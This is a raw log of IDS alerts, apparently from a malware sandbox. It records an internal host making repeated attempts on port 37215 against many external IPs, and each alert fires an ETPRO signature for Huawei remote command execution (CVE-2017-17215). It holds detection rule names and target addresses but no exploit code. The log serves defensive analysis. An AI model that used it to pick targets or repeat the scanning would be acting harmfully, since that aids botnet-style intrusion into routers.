                                            06/14/24-10:43:48.020139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891237215192.168.2.14156.184.133.167
                                            06/14/24-10:43:39.791695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747837215192.168.2.14156.52.112.204
                                            06/14/24-10:44:29.027491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5532637215192.168.2.14197.86.18.121
                                            06/14/24-10:43:54.202238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4899837215192.168.2.1441.255.86.62
                                            06/14/24-10:44:00.336602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524637215192.168.2.14197.96.61.132
                                            06/14/24-10:43:36.701468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5666437215192.168.2.14156.206.33.66
                                            06/14/24-10:44:04.411319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319437215192.168.2.14156.55.59.9
                                            06/14/24-10:43:37.759351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008637215192.168.2.14156.151.244.137
                                            06/14/24-10:44:16.733202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3630437215192.168.2.14197.102.180.34
                                            06/14/24-10:43:43.941180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869637215192.168.2.14197.80.90.185
                                            06/14/24-10:43:58.293565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3351237215192.168.2.14156.89.133.36
                                            06/14/24-10:44:20.831251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184037215192.168.2.14197.248.135.248
                                            06/14/24-10:43:43.971178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523037215192.168.2.14197.14.181.130
                                            06/14/24-10:43:58.293414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501037215192.168.2.1441.236.194.208
                                            06/14/24-10:44:04.421485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837837215192.168.2.14156.17.172.121
                                            06/14/24-10:44:14.670295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4856037215192.168.2.1441.112.19.68
                                            06/14/24-10:43:37.760950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3932837215192.168.2.1441.231.141.130
                                            06/14/24-10:44:08.504192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671837215192.168.2.1441.152.71.253
                                            06/14/24-10:44:18.774926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5580037215192.168.2.14197.4.196.179
                                            06/14/24-10:43:56.227988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155437215192.168.2.14156.197.236.222
                                            06/14/24-10:43:39.791329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302637215192.168.2.1441.7.203.252
                                            06/14/24-10:44:16.716299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055037215192.168.2.1441.12.254.129
                                            06/14/24-10:43:39.811561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958637215192.168.2.1441.230.65.60
                                            06/14/24-10:44:06.470278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188037215192.168.2.1441.232.157.97
                                            06/14/24-10:44:35.176878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899837215192.168.2.1441.236.173.110
                                            06/14/24-10:44:20.830355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513837215192.168.2.14197.39.244.244
                                            06/14/24-10:44:06.453638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637237215192.168.2.14156.207.190.183
                                            06/14/24-10:44:29.013947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137037215192.168.2.1441.239.29.181
                                            06/14/24-10:44:24.915143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660037215192.168.2.14197.157.207.16
                                            06/14/24-10:43:56.225863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3903437215192.168.2.1441.39.176.255
                                            06/14/24-10:44:16.732100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4206437215192.168.2.1441.95.217.28
                                            06/14/24-10:44:12.625043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980237215192.168.2.14156.18.122.45
                                            06/14/24-10:44:31.052725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4679437215192.168.2.14197.6.55.240
                                            06/14/24-10:43:41.848076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486437215192.168.2.14156.255.221.226
                                            06/14/24-10:43:45.987599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4525437215192.168.2.14156.36.118.142
                                            06/14/24-10:44:24.917679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556637215192.168.2.14156.6.3.53
                                            06/14/24-10:44:02.367326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523837215192.168.2.14197.88.122.85
                                            06/14/24-10:44:16.715508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543037215192.168.2.14156.117.98.22
                                            06/14/24-10:44:33.151723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5385237215192.168.2.1441.146.230.20
                                            06/14/24-10:44:08.519385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349437215192.168.2.14197.81.252.138
                                            06/14/24-10:44:02.368522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975837215192.168.2.1441.134.120.168
                                            06/14/24-10:44:26.979647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100437215192.168.2.1441.221.211.156
                                            06/14/24-10:44:04.408013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974637215192.168.2.14156.153.123.154
                                            06/14/24-10:44:16.716112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933437215192.168.2.14156.166.90.226
                                            06/14/24-10:44:16.718343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605837215192.168.2.14197.237.128.169
                                            06/14/24-10:43:48.017636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479837215192.168.2.1441.162.98.171
                                            06/14/24-10:44:35.176828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4465837215192.168.2.14197.117.120.18
                                            06/14/24-10:44:16.733099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001237215192.168.2.14197.122.7.228
                                            06/14/24-10:44:02.364892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4468037215192.168.2.14156.76.190.118
                                            06/14/24-10:44:06.472322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4723237215192.168.2.1441.50.65.41
                                            06/14/24-10:43:34.662840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819037215192.168.2.14197.160.6.126
                                            06/14/24-10:44:00.321246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5903637215192.168.2.14156.49.236.39
                                            06/14/24-10:44:06.472462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5884037215192.168.2.14156.250.122.18
                                            06/14/24-10:44:18.779702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505437215192.168.2.14156.34.54.48
                                            06/14/24-10:44:35.179774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4848237215192.168.2.1441.61.252.103
                                            06/14/24-10:43:50.073880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3799037215192.168.2.14156.218.48.135
                                            06/14/24-10:44:00.338602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4339437215192.168.2.14156.208.182.212
                                            06/14/24-10:43:39.788741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668237215192.168.2.14156.15.196.99
                                            06/14/24-10:44:04.407102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753837215192.168.2.1441.144.106.107
                                            06/14/24-10:43:45.988811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5769237215192.168.2.14156.99.139.249
                                            06/14/24-10:43:58.275104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478837215192.168.2.14156.57.150.143
                                            06/14/24-10:43:58.291028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292837215192.168.2.14156.143.179.188
                                            06/14/24-10:44:16.715230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985437215192.168.2.14156.60.204.212
                                            06/14/24-10:44:22.859140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4816637215192.168.2.1441.3.184.194
                                            06/14/24-10:43:41.847757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3560037215192.168.2.1441.22.208.78
                                            06/14/24-10:44:31.083871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5162837215192.168.2.1441.108.2.173
                                            06/14/24-10:44:20.806783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523037215192.168.2.1441.62.20.140
                                            06/14/24-10:43:48.018729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829637215192.168.2.14197.12.204.244
                                            06/14/24-10:43:58.276861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141237215192.168.2.1441.66.86.12
                                            06/14/24-10:44:02.365505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682237215192.168.2.14197.133.112.9
                                            06/14/24-10:44:04.419973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361037215192.168.2.14156.56.234.235
                                            06/14/24-10:44:16.735331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5622437215192.168.2.14197.205.59.208
                                            06/14/24-10:43:56.229367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688037215192.168.2.14156.124.154.204
                                            06/14/24-10:43:50.073179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3988037215192.168.2.14156.39.19.164
                                            06/14/24-10:44:06.451648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4050037215192.168.2.14197.130.151.50
                                            06/14/24-10:44:14.683558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4015437215192.168.2.14156.193.62.54
                                            06/14/24-10:43:50.071604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911837215192.168.2.14197.121.251.223
                                            06/14/24-10:44:14.672758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800837215192.168.2.14156.32.77.238
                                            06/14/24-10:43:34.675898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428837215192.168.2.1441.25.194.157
                                            06/14/24-10:43:37.763368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5733837215192.168.2.1441.196.87.137
                                            06/14/24-10:44:35.183260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915037215192.168.2.14156.120.45.138
                                            06/14/24-10:44:33.133045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3724037215192.168.2.1441.168.146.143
                                            06/14/24-10:44:31.086109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3736037215192.168.2.14156.64.19.198
                                            06/14/24-10:43:34.679005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3857237215192.168.2.14197.16.96.59
                                            06/14/24-10:44:35.179720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237237215192.168.2.1441.157.90.251
                                            06/14/24-10:44:20.805504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5955837215192.168.2.1441.233.173.114
                                            06/14/24-10:44:18.779502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925437215192.168.2.14197.222.149.183
                                            06/14/24-10:44:18.766994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793237215192.168.2.14197.123.254.247
                                            06/14/24-10:43:45.969714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4057837215192.168.2.14156.203.4.7
                                            06/14/24-10:44:33.149990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265637215192.168.2.14156.155.252.187
                                            06/14/24-10:43:43.972406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3786437215192.168.2.14197.186.145.9
                                            06/14/24-10:43:50.069738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4369437215192.168.2.1441.52.242.36
                                            06/14/24-10:44:06.449381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5776637215192.168.2.14197.103.91.217
                                            06/14/24-10:44:06.449934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489837215192.168.2.14156.237.34.146
                                            06/14/24-10:44:06.472497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776637215192.168.2.14197.92.166.145
                                            06/14/24-10:43:50.115390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297837215192.168.2.1441.151.121.134
                                            06/14/24-10:43:48.028406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549037215192.168.2.14156.31.34.162
                                            06/14/24-10:43:39.790666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626237215192.168.2.14156.44.187.201
                                            06/14/24-10:43:48.029650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3562437215192.168.2.14197.250.236.119
                                            06/14/24-10:43:52.146623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141037215192.168.2.14197.167.185.204
                                            06/14/24-10:44:29.011794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5524837215192.168.2.14197.233.93.28
                                            06/14/24-10:44:24.915667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339037215192.168.2.14197.57.255.1
                                            06/14/24-10:43:37.760566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756837215192.168.2.14197.134.25.235
                                            06/14/24-10:43:50.074343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5601237215192.168.2.1441.82.168.203
                                            06/14/24-10:44:04.411526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848037215192.168.2.1441.86.12.250
                                            06/14/24-10:43:41.847418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894837215192.168.2.14197.101.193.39
                                            06/14/24-10:44:26.997196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6044037215192.168.2.14156.196.233.180
                                            06/14/24-10:44:04.421896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4531437215192.168.2.14197.150.210.132
                                            06/14/24-10:43:45.965518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255037215192.168.2.1441.112.188.18
                                            06/14/24-10:43:48.016156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826237215192.168.2.14197.109.253.54
                                            06/14/24-10:43:52.146266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3375837215192.168.2.1441.195.112.77
                                            06/14/24-10:43:56.246359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4415237215192.168.2.1441.4.246.85
                                            06/14/24-10:44:02.365322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491637215192.168.2.14156.252.104.41
                                            06/14/24-10:44:08.504355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882237215192.168.2.14156.40.190.144
                                            06/14/24-10:43:45.967742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267837215192.168.2.14197.97.215.84
                                            06/14/24-10:43:52.147190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4782637215192.168.2.14156.52.12.151
                                            06/14/24-10:44:29.013474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379437215192.168.2.1441.226.172.85
                                            06/14/24-10:43:43.944169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047637215192.168.2.14197.90.36.252
                                            06/14/24-10:43:58.289664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3715037215192.168.2.1441.184.213.104
                                            06/14/24-10:44:14.682602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792037215192.168.2.14156.166.44.228
                                            06/14/24-10:44:22.859843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390237215192.168.2.14197.165.5.86
                                            06/14/24-10:43:36.704674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142237215192.168.2.14156.195.211.251
                                            06/14/24-10:43:52.145674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723837215192.168.2.14156.255.118.172
                                            06/14/24-10:43:48.032807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658637215192.168.2.14197.238.178.136
                                            06/14/24-10:43:43.943847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004037215192.168.2.1441.36.199.241
                                            06/14/24-10:44:08.521688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118237215192.168.2.14156.21.111.91
                                            06/14/24-10:43:50.111973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815037215192.168.2.14156.80.161.165
                                            06/14/24-10:44:22.878936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282637215192.168.2.14156.233.247.191
                                            06/14/24-10:44:18.777781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807037215192.168.2.1441.70.254.128
                                            06/14/24-10:44:00.322749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157837215192.168.2.1441.219.36.229
                                            06/14/24-10:44:04.422986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4081837215192.168.2.1441.15.108.125
                                            06/14/24-10:44:33.132164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174837215192.168.2.1441.90.112.128
                                            06/14/24-10:43:48.015498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6033037215192.168.2.1441.189.139.194
                                            06/14/24-10:43:50.073087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5569037215192.168.2.14156.13.20.184
                                            06/14/24-10:44:18.762244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5436837215192.168.2.1441.108.14.208
                                            06/14/24-10:43:54.201315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951037215192.168.2.14156.33.227.47
                                            06/14/24-10:44:14.685448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087837215192.168.2.14197.20.5.50
                                            06/14/24-10:43:36.699504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574837215192.168.2.14156.32.16.165
                                            06/14/24-10:44:02.381658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3979837215192.168.2.14156.234.17.58
                                            06/14/24-10:43:34.678527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4231437215192.168.2.14197.142.240.129
                                            06/14/24-10:43:56.244489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553437215192.168.2.14197.167.77.120
                                            06/14/24-10:43:41.847842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102037215192.168.2.14197.158.225.203
                                            06/14/24-10:43:34.676213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5612037215192.168.2.14197.161.54.138
                                            06/14/24-10:43:58.273328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092237215192.168.2.14156.5.236.159
                                            06/14/24-10:44:08.521499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295837215192.168.2.14197.152.45.183
                                            06/14/24-10:44:33.151673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593037215192.168.2.1441.225.25.23
                                            06/14/24-10:43:34.660938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482637215192.168.2.1441.229.152.150
                                            06/14/24-10:43:34.662882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735837215192.168.2.1441.86.97.148
                                            06/14/24-10:44:33.152553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3363237215192.168.2.14156.51.35.195
                                            06/14/24-10:44:10.563111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3670237215192.168.2.14156.59.18.141
                                            06/14/24-10:44:29.023263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3708037215192.168.2.14156.62.3.233
                                            06/14/24-10:44:14.670997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5647237215192.168.2.14156.40.18.93
                                            06/14/24-10:43:58.277330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013237215192.168.2.14156.86.117.14
                                            06/14/24-10:43:48.031369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775837215192.168.2.14156.30.229.131
                                            06/14/24-10:43:56.244400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4371037215192.168.2.1441.137.230.147
                                            06/14/24-10:44:18.776621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4023237215192.168.2.14156.123.101.57
                                            06/14/24-10:44:20.807232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859837215192.168.2.14156.133.39.52
                                            06/14/24-10:44:06.471934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606837215192.168.2.1441.208.191.17
                                            06/14/24-10:44:33.151852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5701037215192.168.2.14156.64.243.142
                                            06/14/24-10:44:35.180116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5138637215192.168.2.14197.161.111.217
                                            06/14/24-10:44:20.807629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543637215192.168.2.1441.199.227.122
                                            06/14/24-10:44:22.860995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931237215192.168.2.1441.140.2.198
                                            06/14/24-10:43:48.032765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4081237215192.168.2.14156.96.55.108
                                            06/14/24-10:43:56.227370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4490437215192.168.2.14156.202.185.218
                                            06/14/24-10:44:24.917010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568237215192.168.2.14156.132.100.58
                                            06/14/24-10:43:54.201097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719237215192.168.2.14156.104.69.31
                                            06/14/24-10:44:00.324029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3404037215192.168.2.14197.23.241.220
                                            06/14/24-10:43:36.704115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837237215192.168.2.14197.45.160.57
                                            06/14/24-10:44:08.519277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677237215192.168.2.14156.16.163.76
                                            06/14/24-10:43:48.019614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3856437215192.168.2.14197.129.248.44
                                            06/14/24-10:44:04.420774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355637215192.168.2.14156.252.198.195
                                            06/14/24-10:43:43.967486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5086437215192.168.2.14156.90.91.0
                                            06/14/24-10:44:12.616309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032637215192.168.2.14197.130.54.137
                                            06/14/24-10:43:43.943598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5909037215192.168.2.1441.105.102.98
                                            06/14/24-10:44:33.152470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5723237215192.168.2.14197.189.183.185
                                            06/14/24-10:43:52.164909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212637215192.168.2.14156.216.131.189
                                            06/14/24-10:44:08.505337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920637215192.168.2.14197.62.21.185
                                            06/14/24-10:44:27.001695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4175237215192.168.2.1441.184.94.185
                                            06/14/24-10:44:29.021891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4467637215192.168.2.14197.93.116.7
                                            06/14/24-10:44:04.422072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932837215192.168.2.14156.152.138.230
                                            06/14/24-10:43:41.850582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4845837215192.168.2.14156.22.246.78
                                            06/14/24-10:43:43.941864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549637215192.168.2.14197.13.201.37
                                            06/14/24-10:43:54.201421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4765237215192.168.2.1441.172.20.162
                                            06/14/24-10:43:54.199734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891837215192.168.2.14197.244.104.174
                                            06/14/24-10:44:22.883045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793437215192.168.2.1441.184.154.71
                                            06/14/24-10:43:48.030122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204837215192.168.2.14156.139.102.229
                                            06/14/24-10:44:10.567133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705437215192.168.2.14156.136.112.159
                                            06/14/24-10:43:58.290011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5231437215192.168.2.1441.186.133.241
